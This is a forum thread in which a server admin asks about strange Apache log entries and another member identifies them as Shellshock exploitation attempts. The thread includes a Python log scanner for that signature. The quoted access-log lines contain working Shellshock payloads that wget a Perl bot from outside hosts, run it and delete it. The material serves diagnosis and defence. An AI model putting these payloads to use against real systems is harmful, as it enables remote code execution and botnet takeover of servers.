The Community Forums


Looks like someone trying to upload files to the server

Discussion in 'Security' started by tank, Nov 11, 2014.

  1. tank

    tank Well-Known Member

    Joined:
    Apr 12, 2011
    Messages:
    236
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Chicago, IL
    cPanel Access Level:
    Root Administrator
    I noticed this in my apache error log.

    Code:
    [Tue Nov 11 17:42:53.073036 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Connecting to 209.20.86.222:80... 
    [Tue Nov 11 17:42:53.135079 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: connected.
    [Tue Nov 11 17:42:53.135164 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: HTTP request sent, awaiting response... 
    [Tue Nov 11 17:42:53.197484 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 200 OK
    [Tue Nov 11 17:42:53.197549 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Length: 7488 (7.3K) [text/plain]
    [Tue Nov 11 17:42:53.197583 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Saving to: `/tmp/jack.jpg'
    [Tue Nov 11 17:42:53.197596 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
    [Tue Nov 11 17:42:53.197615 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:      0K ...
    [Tue Nov 11 17:42:53.259697 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: ....                  
    [Tue Nov 11 17:42:53.259778 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                              100%  118K=0.06s
    [Tue Nov 11 17:42:53.259793 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
    [Tue Nov 11 17:42:53.260010 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 2014-11-11 17:42:53 (118 KB/s) - `/tmp/jack.jpg' saved [7488/7488]
    [Tue Nov 11 17:42:53.260030 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
    [Tue Nov 11 17:42:53.264777 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
    [Tue Nov 11 17:42:53.264817 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: curl: (3)  malformed
    [Tue Nov 11 17:42:53.327853 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
    [Tue Nov 11 17:42:53.328035 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                                  Dload  Upload   Total   Spent    Left  Speed
    [Tue Nov 11 17:42:53.328119 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
    [Tue Nov 11 17:42:53.453541 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r101  7488
    [Tue Nov 11 17:42:53.453691 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   101  7488    0     0  39691      0 --:--:-- --:--:-- --:--:-- 59904
    I looked for this file that was uploaded but could not find it.

    How do I disable this, and/or what is this?
     
  2. 24x7server

    24x7server Well-Known Member

    Joined:
    Apr 17, 2013
    Messages:
    1,146
    Likes Received:
    34
    Trophy Points:
    48
    Location:
    India
    cPanel Access Level:
    Root Administrator
  3. malk315

    malk315 Registered

    Joined:
    Nov 13, 2014
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Website Owner
    This looks like a shellshock attack attempt. It tried to download jack.jpg from a server in Germany and run it (it is a perl script) which then sets up some type of bot that may be controlled through IRC or something. I cleaned one up and updated Bash recently.

    Log:

    Code:
    165.233.46.204 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O
     /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
    Here's another one:

    Code:
    81.145.204.4 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \\x22cd /tmp;wget  http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf /tm
    p/lifesux.txt\\x22" "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf  lifesux.txt\\x22"
    The telltale sign that a request is trying to exploit the shellshock vulnerability in your BASH shell is the function definition at the beginning:

    Code:
    () { :; }
    If you have an old version of BASH, update -- might need to build from source unless your box is really new.

    There are lots of good sites out there that explain how to deal w/ shellshock.
    I found this one quite helpful:

    https://shellshocker.net/

    Good luck.
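As an added example (not part of the post above and not cPanel code), the following script scans Apache access-log lines for the `() { :;}` signature malk315 describes in the Referer and User-Agent fields and pulls out the download URLs the payload references, so an admin can grep their logs and collect indicators. The log lines are constructed samples with reserved IPs and the `example.invalid` host; only the format follows the logs quoted in the thread.

```python
import re
from typing import NamedTuple, Optional, List

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain backslash-escaped characters (\" and \x22), so allow "\\." inside them.
_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Shellshock trigger: an exported-function definition such as "() { :;}" or "() { :; }" at the
# start of a header value; whatever follows the closing brace is what bash executes.
_SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;?\s*\}')
# URLs the dropper fetches (with or without a scheme), terminated by whitespace, ';' or a quote.
_URL_RE = re.compile(r'(?:https?://|www\.)[^\s;"\\]+')

class Hit(NamedTuple):
    ip: str
    time: str
    request: str
    field: str        # which header carried the payload: "referer" or "agent"
    urls: tuple       # download URLs found in the payload (indicators to block / hunt for)

def scan_line(line: str) -> Optional[Hit]:
    """Return a Hit if the line carries a Shellshock-style payload, else None."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    for field in ("referer", "agent"):
        value = m.group(field)
        if _SHELLSHOCK_RE.search(value):
            return Hit(m.group("ip"), m.group("time"), m.group("request"),
                       field, tuple(_URL_RE.findall(value)))
    return None

def scan(lines: List[str]) -> List[Hit]:
    return [h for h in (scan_line(l) for l in lines) if h is not None]

# Constructed sample log (reserved addresses, example.invalid host); the third line is benign.
SAMPLE_LOG = r"""
192.0.2.10 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'system(\"wget http://example.invalid/jack.jpg -O /tmp/jack.jpg;perl /tmp/jack.jpg\");'"
192.0.2.11 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \x22cd /tmp;wget http://example.invalid/lifesux.txt;perl /tmp/lifesux.txt\x22" "-"
198.51.100.7 - - [11/Nov/2014:17:40:01 -0600] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (X11; Linux x86_64)"
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.ip} {hit.time} {hit.request!r} via {hit.field}: {', '.join(hit.urls)}")
```

Run it against a real log with `scan(open("/usr/local/apache/logs/access_log").read().splitlines())`; a hit only shows an attempt, so whether it succeeded still depends on the bash version and on what the CGI actually executed.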
     
  4. tank

    tank Well-Known Member

    Joined:
    Apr 12, 2011
    Messages:
    236
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Chicago, IL
    cPanel Access Level:
    Root Administrator
    Thanks guys for your answers. I will take a look.
     